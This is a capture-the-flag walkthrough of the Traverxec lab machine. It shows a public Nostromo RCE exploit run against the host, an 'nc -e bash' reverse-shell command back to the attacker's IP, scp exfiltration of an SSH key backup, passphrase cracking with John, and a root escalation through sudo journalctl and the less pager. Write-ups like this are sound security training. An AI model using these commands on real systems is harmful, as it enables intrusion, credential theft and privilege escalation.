Again, we start with nmap -sC -sV -Pn -p- -oA ./Traverxec 10.10.10.165
We've got HTTP and SSH on a their standard ports and we know that HTTP is running Nostromo 1.9.6. There's nothing special on the page itself and Gobuster shows us nothing interesting. Searchsploit for Nostromo 1.9.6 gives us a quick RCE route to take. Let's start there.
Let's grab that python exploit, run it and see what happens.
python 47837.py 10.10.10.165 80 whoami
Awesome. The RCE works. Now let's turn that into a shell by making the command an netcat callback. Use the standard nc -lvnp 4444 on your machine and run the exploit as:
python 47837.py 10.10.10.165 80 "nc -e bash 10.10.14.7 4444"
and we have a www-data shell. Checking the home directory, we see a "david" folder, but no dice listing the contents. Looking around, we do see that nostromo is running in /var/nostromo and the configs are in /var/nostromo/conf. (Completely unrelated, but is anyone else getting an "Aliens" vibe here? I mean "THE Nostromo" C'mon! I can't be the only one) Anyways. Checking out the /var/nostromo/conf/nhttpd.conf file and the .htpasswd files give us some interesting information.
www-data@traverxec:/var/nostromo/conf$ cat ./.htpasswd
# HOMEDIRS [OPTIONAL]
Changing back into david's home folder, I try to list out the public_www folder and actually get a result of a protected-file-area, which has a backup of ssh identities. Time to see if I can snag that file.
$ scp ./public_www/protected-file-area/backup-ssh-identity-files.tgz email@example.com:/home/kali/Desktop/Traverxec/sshbackups.tgz
Now, I use tar -xvf to extract the files.
tar -xvf sshbackups.tgz
We get these files.
SSH as David time. Aaaaannnnddd ROADBLOCK. Of course the RSA key has a passphrase. No big deal. I can kick that into John and hopefully crack it with rockyou.txt.
kali@kali:~/Desktop/Traverxec/home/david/.ssh$ python3 /usr/share/john/ssh2john.py id_rsa > ../../../hash.txt
In case you're wondering, I went back a few dirs so that all my Traverxec files are in the same place. Personal preference, but you do you. We run it through ssh2john and then john and the passphrase is <insert requisite drumroll> "hunter"
So, let's try SSH again now that we know the passphrase. No surprise, but it is successful and we actually have a "save point" if you will. Grab the user flag while you're here and let's start enumerating to root. The LinEnum output is in the CTB file as always. In David's home folder is a bin folder with a server-stats.sh script:
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
I believe I should be able to modify that final line that runs journalctl as sudo by exploiting the less pager command and a GTFPbin. If I run the last line prior to the | it should invoke the "less" command at which point I can expand the window and then !/bin/bash and grab a root shell. Let's test that out.
Amazingly, that worked! Another box down.